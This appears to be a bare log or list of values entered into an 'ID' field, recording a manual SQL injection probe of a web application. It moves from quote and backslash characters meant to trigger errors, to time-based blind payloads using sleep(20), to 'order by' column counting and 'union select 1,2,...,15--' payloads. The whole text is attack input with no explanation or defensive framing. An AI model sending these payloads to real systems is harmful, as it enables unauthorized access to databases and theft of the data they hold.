ID:1
ID:1
ID:1
ID:1'
ID:1
ID:1'
ID:2
ID:2
ID:2'
ID:2'
ID:2
ID:1
ID:1'
ID:1'
ID:1'
ID:1''
ID:1'
ID:1"
ID:1
ID:1|
ID:1\
ID:1\
ID:1\
ID:1\
ID:1\
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1'
ID:1''
ID:1'''
ID:1''''
ID:1'
ID:1''''
ID:1
ID:2
ID:3
ID:3
ID:3'
ID:3'
ID:3'
ID:3'
ID:3\
ID:3''
ID:3'
ID:3' select (sleep(20))
ID:3' union select (sleep(20))
ID:3' union select (sleep(20))--
ID:3' union select (sleep(20))--
ID:3
ID:1'
ID:1 order by 1
ID:1 order by 5
ID:1 order by 10
ID:1 order by 100
ID:1 order by 100
ID:1 order by 100
ID:1 union all select 1,2
ID:1 union all select 1,2,3,4,5,6,7,8,9,10
ID:1 'union all select 1,2,3,4,5,6,7,8,9,10
ID:1 union all select 1,2,3,4,5,6,7,8,9,10
ID:1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
ID:1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
ID:1'
ID:1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
ID:1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
ID:1'
